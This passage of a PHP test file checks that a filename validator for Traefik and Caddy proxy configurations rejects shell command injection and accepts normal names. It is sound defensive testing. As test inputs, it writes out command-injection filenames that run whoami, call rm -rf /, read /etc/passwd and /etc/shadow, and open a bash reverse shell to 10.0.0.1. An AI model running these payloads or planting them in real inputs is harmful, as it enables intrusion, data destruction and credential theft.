validateShellSafePath('test$(whoami)', 'proxy configuration filename')) ->toThrow(Exception::class); }); test('proxy configuration rejects command injection with semicolon', function () { expect(fn () => validateShellSafePath('config; id > /tmp/pwned', 'proxy configuration filename')) ->toThrow(Exception::class); }); test('proxy configuration rejects command injection with pipe', function () { expect(fn () => validateShellSafePath('config | cat /etc/passwd', 'proxy configuration filename')) ->toThrow(Exception::class); }); test('proxy configuration rejects command injection with backticks', function () { expect(fn () => validateShellSafePath('config`whoami`.yaml', 'proxy configuration filename')) ->toThrow(Exception::class); }); test('proxy configuration rejects command injection with ampersand', function () { expect(fn () => validateShellSafePath('config && rm -rf /', 'proxy configuration filename')) ->toThrow(Exception::class); }); test('proxy configuration rejects command injection with redirect operators', function () { expect(fn () => validateShellSafePath('test > /tmp/evil', 'proxy configuration filename')) ->toThrow(Exception::class); expect(fn () => validateShellSafePath('test < /etc/shadow', 'proxy configuration filename')) ->toThrow(Exception::class); }); test('proxy configuration rejects reverse shell payload', function () { expect(fn () => validateShellSafePath('test$(bash -i >& /dev/tcp/10.0.0.1/9999 0>&1)', 'proxy configuration filename')) ->toThrow(Exception::class); }); test('proxy configuration escapes filenames properly', function () { $filename = "config'test.yaml"; $escaped = escapeshellarg($filename); expect($escaped)->toBe("'config'\\''test.yaml'"); }); test('proxy configuration escapes filenames with spaces', function () { $filename = 'my config.yaml'; $escaped = escapeshellarg($filename); expect($escaped)->toBe("'my config.yaml'"); }); test('proxy configuration accepts legitimate Traefik filenames', function () { expect(fn () => validateShellSafePath('my-service.yaml', 'proxy configuration filename')) ->not->toThrow(Exception::class); expect(fn () => validateShellSafePath('app.yml', 'proxy configuration filename')) ->not->toThrow(Exception::class); expect(fn () => validateShellSafePath('router_config.yaml', 'proxy configuration filename')) ->not->toThrow(Exception::class); }); test('proxy configuration accepts legitimate Caddy filenames', function () { expect(fn () => validateShellSafePath('my-service.caddy', 'proxy configuration filename')) ->not->toThrow(Exception::class); expect(fn () => validateShellSafePath('app_config.caddy', 'proxy configuration filename')) ->not->toThrow(Exception::class); });